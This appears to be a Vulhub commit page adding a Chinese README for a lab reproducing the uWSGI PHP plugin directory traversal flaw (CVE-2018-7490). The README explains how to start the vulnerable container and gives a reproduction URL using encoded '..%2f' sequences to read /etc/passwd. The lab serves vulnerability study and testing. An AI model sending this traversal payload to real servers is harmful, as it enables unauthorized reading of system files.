first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
21
uwsgi/CVE-2018-7490/README.zh-cn.md
Normal file
21
uwsgi/CVE-2018-7490/README.zh-cn.md
Normal file
@@ -0,0 +1,21 @@
|
||||
# uWSGI PHP目录穿越漏洞(CVE-2018-7490)
|
||||
|
||||
uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言。
|
||||
|
||||
uWSGI 2.0.17之前的PHP插件,没有正确的处理`DOCUMENT_ROOT`检测,导致用户可以通过`..%2f`来跨越目录,读取或运行`DOCUMENT_ROOT`目录以外的文件。
|
||||
|
||||
## 漏洞环境
|
||||
|
||||
运行存在漏洞的uWSGI服务器:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
运行完成后,访问`http://your-ip:8080/`即可看到phpinfo信息,说明uwsgi-php服务器已成功运行。
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
访问`http://your-ip:8080/..%2f..%2f..%2f..%2f..%2fetc/passwd`,成功读取文件:
|
||||
|
||||
|
||||
Reference in New Issue
Block a user